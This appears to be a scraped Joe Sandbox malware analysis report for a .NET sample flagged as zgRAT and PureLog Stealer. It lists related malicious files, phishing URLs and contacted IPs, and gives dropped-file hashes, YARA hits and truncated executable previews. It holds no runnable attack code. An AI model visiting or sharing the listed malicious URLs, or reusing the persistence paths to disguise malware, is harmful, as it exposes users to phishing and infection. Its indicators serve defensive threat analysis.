	SecuriteInfo.com.Win32.TrojanX-gen.32746.21570.dll	Get hash	malicious	Unknown	Browse	150.171.28.10
	95.msi	Get hash	malicious	RedLine	Browse	150.171.28.10
ipinfo.io	Documentazione n 231-111.exe	Get hash	malicious	Destiny Stealer, PureLog Stealer, StormKitty, zgRAT	Browse	34.117.59.81
	https://richardsmylawyer.com/?YmJhbHRpbW9yZUBoYXJyaXN3aWxsaWFtcy5jb20=	Get hash	malicious	Unknown	Browse	34.117.59.81
	Documentazione n 231-111.exe	Get hash	malicious	Destiny Stealer, PureLog Stealer, StormKitty, zgRAT	Browse	34.117.59.81
	IPTV Tool Pro.rar	Get hash	malicious	Destiny Stealer, StormKitty	Browse	34.117.59.81
	m4xOBcNhab.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	34.117.59.81
	35Zte4RMiO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	34.117.59.81
	DS.EXE	Get hash	malicious	Unknown	Browse	34.117.59.81
	DS.EXE	Get hash	malicious	Unknown	Browse	34.117.59.81
	DS.EXE	Get hash	malicious	Unknown	Browse	34.117.59.81
	0rDtDZ6Foa.pdf	Get hash	malicious	HTMLPhisher	Browse	34.117.59.81
api.telegram.org	jjohnson@bagtoearth.com-Paymentreceipt.htm	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	rarrivalnotice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	50% deposit's payment advice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	AI_25_46416_418811192810.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	rPurchaseOrder-25-1201.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Verger Doc.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Payment_Advice.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	HSBC_USD31,073.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	BGgPmeaRBs.exe	Get hash	malicious	Xmrig	Browse	149.154.167.220
	https://gt.netroli.top/	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Yanto v1.2.exe	Get hash	malicious	LummaC Stealer	Browse	149.154.167.99
	jjohnson@bagtoearth.com-Paymentreceipt.htm	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	rarrivalnotice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	50% deposit's payment advice.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rPurchaseOrder-25-1201.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Verger Doc.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2raqmphRKT.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer	Browse	149.154.167.220
	Payment_Advice.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	HSBC_USD31,073.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	rhsvjqRoEV.exe	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, XWorm	Browse	149.154.167.220
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	https://digi-searches.com/	Get hash	malicious	Unknown	Browse	34.67.147.7
	http://pqpqpyj.sbs/av/avr08/index.php?lpkey=174043cdcee2702426549f3edfdcca41a099969599&trkd=omokeh.org&lpkey1=cuun8cujn1oc7393lv6g&language=de&scanid=cuun8cujn1oc7393lv6g&ip=147.161.235.77&t1=133&t2=%7Bt1%7D&t3=%7Bt2%7D&t4=49&t5=174123395189&dm=1&pbid=4598&uid=Tev3Ewws7LqtzrNjCqkamFhqO8Mhj2&t10=4833	Get hash	malicious	Unknown	Browse	34.117.239.71
	Documentazione n 231-111.exe	Get hash	malicious	Destiny Stealer, PureLog Stealer, StormKitty, zgRAT	Browse	34.117.59.81
	https://richardsmylawyer.com/?YmJhbHRpbW9yZUBoYXJyaXN3aWxsaWFtcy5jb20=	Get hash	malicious	Unknown	Browse	34.117.59.81
	PowerISO9-x64.exe	Get hash	malicious	Unknown	Browse	34.117.223.223
	PowerISO9-x64.exe	Get hash	malicious	Unknown	Browse	34.117.223.223
	yakov.mpsl.elf	Get hash	malicious	Mirai	Browse	34.118.220.133
	Documentazione n 231-111.exe	Get hash	malicious	Destiny Stealer, PureLog Stealer, StormKitty, zgRAT	Browse	34.117.59.81
	http://xn--ftbollibre-ndb.su	Get hash	malicious	Unknown	Browse	34.117.77.79
	yakov.arm.elf	Get hash	malicious	Mirai	Browse	34.117.124.243
CLOUDFLARENETUS	CV Jennyfer Rojas.exe	Get hash	malicious	FormBook	Browse	172.67.130.15
	https://jok.darfeistud.ru/n0raBLCJ/	Get hash	malicious	Unknown	Browse	104.17.25.14
	month_to_month_lease_agreemen.js	Get hash	malicious	Unknown	Browse	104.21.2.155
	https://vdot.virginia-ticketrb.xin/us	Get hash	malicious	Unknown	Browse	172.67.208.62
	https://brisamar.com.ar/invite/policy.html	Get hash	malicious	Unknown	Browse	104.18.94.41
	https://vdot.virginia-ticketrb.xin/us/	Get hash	malicious	Unknown	Browse	172.67.208.62
	http://imagekit.io/public/share/jedyb8c6o/3d23bf1bd85df6054e8a36ee022113464d68972afd38ce381e64fdf1933d3f92b711d4946c66a4059145e4bf1ff2ccffc63e817dd4e19d81d6140278ab6c7b542101c8bd792e064f02c249b7b97286a6	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	172.66.0.227
	401k_Benefits_Lcatterton_Info_2025.docx	Get hash	malicious	Unknown	Browse	104.21.96.1
	https://linkpop.com/angela25	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://app.hellobonsai.com/link/c8063f67300b3cd93813c8bb88f58154?utm_campaign=send_to_client&utm_content=primary-btn&utm_medium=email&utm_source=proposals	Get hash	malicious	Unknown	Browse	162.247.243.29

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	month_to_month_lease_agreemen.js	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	assistente_de_cotacao_2025.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	assistente_de_cotacao_2025.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	http://reedhawkins.watsonrealtycorp.com/shared/email/crm/clickthru.php?hash=4ff934a7bb0a81c8c46fcc9a6676fcd3&aid=81803571&return_page=http%3A%2F%2Fmartinscarnes.com.br/grdsergj/9ae7d9b9f91e861f723b82dea8d97fa5/YWNjb3VudHNyZWNlaXZhYmxlQGNoZW1zb2x2LmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220 34.117.59.81
	http://korsrattell.xyz/4bUrMU17658gAJP359taoqjqqssr448MNOACNBMSROVZUK9615CIOL2759I40	Get hash	malicious	Phisher	Browse	149.154.167.220 34.117.59.81
	https://5ef9.uteativa.ru/LT5eK/	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	149.154.167.220 34.117.59.81
	InProgressOcean.XLS	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81
	Review Tempus wages bonus For 2025 Compensation Disbursement.pdf	Get hash	malicious	HTMLPhisher, Invisible JS	Browse	149.154.167.220 34.117.59.81
	morninghtaaaafilex.hta	Get hash	malicious	AgentTesla	Browse	149.154.167.220 34.117.59.81
	svchost.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 34.117.59.81

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\DsQyKcEJ.log	m4xOBcNhab.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	35Zte4RMiO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	XkggQZnZYs.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	X9aIq7jyai.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	7HLZuA5T52.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	bwJj13Uume.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	5YQh6vimLL.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	28jkhqVuUO.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	jY666H3kgo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	5gYYzWB11s.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe

Download File

Process:	C:\Users\user\Desktop\SfbAu0ICZn.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1928192
Entropy (8bit):	7.542358275581554
Encrypted:	false
SSDEEP:	24576:9FcKDvnM4oG8fsgeZfeP2S5IN4XsPlbD0MD73+UgRDivAHgE+2n6j9UJk7wHvgra:vnjF8YYPQdPV3DiUgcNbye7SYzz
MD5:	BA5406A838158DFABA199F47DDA74695
SHA1:	FE95B058C2739D9205B7B55084E66DDF06A0E2F9
SHA-256:	1F2589CDB8F52EC0F5AFC879661B583B41F43BE6E649FF7BE8F0485795CAD07D
SHA-512:	D1FC36280BF08DFAA6DED3959D3675D41F41568A965F18931C452B95E5584BDD8BFF8EE0741AF35AA0710B9E06F261C52A31981D44D8AD8325C2A6971202EEA9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~.g.................d.............. ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....c... ...d.................. ..`.rsrc... ............f..............@....reloc...............j..............@..B........................H.......................x...o............................................0..........(.... ........8........E...............N...8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ........8........0..<....... ........8........E....................\...........8....r...ps....z*~....(;... .... .... ....s....~....(?....... ....~....{....:....& ....8........~....(C...~....(G... ....<.... ....8W...~....9C... ....~....{....:9...& ....8....8Z... ....~.

C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\SfbAu0ICZn.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files (x86)\Google\Update\Install\bc2e42a7e744cd

Download File

Process:	C:\Users\user\Desktop\SfbAu0ICZn.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.656458049441984
Encrypted:	false
SSDEEP:	3:SMmF1JoP6PSXIp+NrAfLXg9IUIBzXGyooKI7qhthUEV1X0uh728HLWvf+JeWOcVz:OoPbbr6bgqUItGyoZWqBdr7N28HiH+cI
MD5:	ADC5EB65876D402B492164B245B57F70
SHA1:	8B516AFFB178B9C958FFEC3E42E631CB7D170160
SHA-256:	8599B29C6846E4DA9866160C81AB3048B38D0BBC9C08909BFA8953A072EB2028
SHA-512:	DE5C0009542D1BDD8417CB06B1752A8938DC1A471E5A76250AD8E71BB4E92055F06A91F9C05FA2B7EF805B01AF013805E7B36CCDBA36C4BC6EE780335246B81A
Malicious:	false
Preview:	BMwOchbiBZWGyEmIfLimMO6wy1OE5Uw6fyF2mWzpYVjchNezvmlkLi8xQ9ZkSXmqmalA9tfIV2O0pdPlWYTTtMu6zRmm7OXBs2zHme0BGcOTTHIxuxO3DT7apoKrH2KGfNHxnH92iSMQ7bnsJz2KAe7Z4Zb7TI3NSHyG9VJmyWUvHrcOBci

C:\Program Files\7-Zip\c743cc6a02740e

Download File

Process:	C:\Users\user\Desktop\SfbAu0ICZn.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	259
Entropy (8bit):	5.748434004697276
Encrypted:	false
SSDEEP:	6:QffV0hvzphzpQTlpE10K8OURm+v/ZhTOmARRkXluP:QCbPpIS8xJimAse
MD5:	51F20B04C828B55E6096CAE5165F3436
SHA1:	AA50E2CB6EAC5B31B539207B9F3223DC86F66693
SHA-256:	174C4EC4D39F6E2EC921490161067166BB15601E8ECDD73BAFF132C56F415487
SHA-512:	41987AC9BB189949ED1C8A5FC7C25DE1E0FFEFFE0319014124D7CF0B6E96BBEA661A9E0F259C6D1550CC458442BB71EB3C7073B345DE428D762AEFC7F1BAEE28
Malicious:	false
Preview:	s2OpBiaY880nhsypPVoJMRN6N61jkNSBw0Qc56wx4WIsmleuunuob2CaoRbFr0yuqy0qbVuSj0O0JeUmcHz7dnj4x0xnfrGEiXCxvxSY2bFknMRK6znkA0RCO53lhHx1uJSvbh1oyaFBi9QkinqpDgErFAiz4r1vnN0e4fsZ78vjvQePoSC4aIyNFkpb8BuGjTXUIwqC5RrFue6zfSLmo7VfZnYTzRa6NpAb2KG1lA9Iasclo05q0Icm824fXXMn1v1

C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe

Download File

Process:	C:\Users\user\Desktop\SfbAu0ICZn.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1928192
Entropy (8bit):	7.542358275581554
Encrypted:	false
SSDEEP:	24576:9FcKDvnM4oG8fsgeZfeP2S5IN4XsPlbD0MD73+UgRDivAHgE+2n6j9UJk7wHvgra:vnjF8YYPQdPV3DiUgcNbye7SYzz
MD5:	BA5406A838158DFABA199F47DDA74695
SHA1:	FE95B058C2739D9205B7B55084E66DDF06A0E2F9
SHA-256:	1F2589CDB8F52EC0F5AFC879661B583B41F43BE6E649FF7BE8F0485795CAD07D
SHA-512:	D1FC36280BF08DFAA6DED3959D3675D41F41568A965F18931C452B95E5584BDD8BFF8EE0741AF35AA0710B9E06F261C52A31981D44D8AD8325C2A6971202EEA9
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~.g.................d.............. ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....c... ...d.................. ..`.rsrc... ............f..............@....reloc...............j..............@..B........................H.......................x...o............................................0..........(.... ........8........E...............N...8....(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ........8........0..<....... ........8........E....................\...........8....r...ps....z*~....(;... .... .... ....s....~....(?....... ....~....{....:....& ....8........~....(C...~....(G... ....<.... ....8W...~....9C... ....~....{....:9...& ....8....8Z... ....~.

C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\SfbAu0ICZn.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xd839c3b3, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221384136052944
Encrypted:	false
SSDEEP:	1536:5SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:5aza/vMUM2Uvz7DO
MD5:	F012001B37A7CD7291DD16B36CF5F51F
SHA1:	6A40F7FECEDEAB856B131B200389A21E76FB8877
SHA-256:	E1CA7E25765B0FF7C568645084CE760DFC9FB1A3381F3D2C34F59B6205F03ABD
SHA-512:	760AFC6CBDE758B4BAA4F6A16539F54699101205A20281946F0A2D2E6A96012181722C3081FF797A911DAAF53B84E4072A8D88BA65C98CAD9A9A752F96615B7B
Malicious:	false
Preview:	.9.... .......A.......X\...;...{......................0.!..........{A.&....}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................T.%T&....}...................4N.&....}!..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\Recovery\5a66f7049adfc5

Download File

Process:	C:\Users\user\Desktop\SfbAu0ICZn.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	274
Entropy (8bit):	5.754722448585248
Encrypted:	false
SSDEEP:	6:CZKRjO8DySm/60RWrA/e+mE4CZuU6F4NHw6/o9i4WJatiLoAjUJO:C0ggyxwrAsfCQUTNT/UjXSoAgA
MD5:	908735910393269AE4C37A2B0963E1F7
SHA1:	7CCADB3D0F541938A48E7D08B99755F3A61A9CC9
SHA-256:	2CAB78B68794788533F33FBE11C3A955613E9B36477287B6B1B250EEB42DEF95
SHA-512:	BE6C2F6C222713253065D304E7FDC679F9F3FACE45E550647683BF3CAB616885031C5550B751D92BB3237C632AF13B2810DBB55A74D8F7B8B7BBE38D4F620AE4
Malicious:	false
Preview:	HKorj5lvgTn3LWUJ8kYFB06zYzpOeIhkFQ0NS4r4OiVNALkZzDWAs8PQOzStQWRYwCy5gG0E2e1cfsyNPPZavg1GBk9dl7n1R6a8Xp3sMSHOHwufAFeA70mPKr36HXc509LiR0zkVqNdZn9Ozdcgcn4aUKxqv7lzzMXHkLNKQ4pRnI0hsoGn46cNFvOGDJyXEYnMQ1nnQRQi8nxLUP7G1843tJCz7GHGFRMPenR0AcXmq4Pb7DwxLsgGducGyyqJKJcqaiqq8GFYlRMz4k

C:\Recovery\9e8d7a4ca61bd9

Download File

Process:	C:\Users\user\Desktop\SfbAu0ICZn.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	204
Entropy (8bit):	5.791698860240452
Encrypted:	false
SSDEEP:	3:pdoQc+1rUDKWi0Ze/gleMr/mmEEGcqy2zRpTxh9HwfLU1JkTy920GH1qoQmW:ziKEKWTZmaeMDnIN1fQfLU1JyyMVqoVW
MD5:	FA7B41228BC0791E6E134DA880964CA2
SHA1:	0E397EC1AE7FBF0141F6E0E3F58F11C6667AADE7
SHA-256:	F7343243330185A0BD6581BAB0F666D71E0B12A5B68EF7CA2881EBD198678968
SHA-512:	787085678F318A4F3B4600ADD0EF14E1A4DBCD97BBE59D3FB89E49554CF3754289FD43C7CF474BDCCDA6C167D6670D1C0DB6E6782C0C2C84027934B77D4123C3
Malicious:	false
Preview:	TAo8MEqKxp9VuFFNXcAPleNxVRo1WHJ3jdhHxowxOVjsNSGqw2GC6Glyw0m4ZzxqfFvQh7ZtqMBQ4fjCK8EeAG7d2sU6B1YYh3MIg0IycXWuFV4RRjtbvTpZISXzmcrzymsBTbgU0PBnuMXhyDpbH6nONwANcSMAph6cm38zDZlfRBp550BixQr19exgaT2hDB8MQ454FzYs

C:\Recovery\RuntimeBroker.exe

Download File

Process:	C:\Users\user\Desktop\SfbAu0ICZn.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1928192
Entropy (8bit):	7.542358275581554
Encrypted:	false
SSDEEP:	24576:9FcKDvnM4oG8fsgeZfeP2S5IN4XsPlbD0MD73+UgRDivAHgE+2n6j9UJk7wHvgra:vnjF8YYPQdPV3DiUgcNbye7SYzz
MD5:	BA5406A838158DFABA199F47DDA74695
SHA1:	FE95B058C2739D9205B7B55084E66DDF06A0E2F9
SHA-256:	1F2589CDB8F52EC0F5AFC879661B583B41F43BE6E649FF7BE8F0485795CAD07D
SHA-512:	D1FC36280BF08DFAA6DED3959D3675D41F41568A965F18931C452B95E5584BDD8BFF8EE0741AF35AA0710B9E06F261C52A31981D44D8AD8325C2A6971202EEA9

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SfbAu0ICZn.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe

C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe:Zone.Identifier

C:\Program Files (x86)\Google\Update\Install\bc2e42a7e744cd

C:\Program Files\7-Zip\c743cc6a02740e

C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe

C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe:Zone.Identifier

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\Recovery\5a66f7049adfc5

C:\Recovery\9e8d7a4ca61bd9

C:\Recovery\RuntimeBroker.exe

Windows Analysis Report
SfbAu0ICZn.exe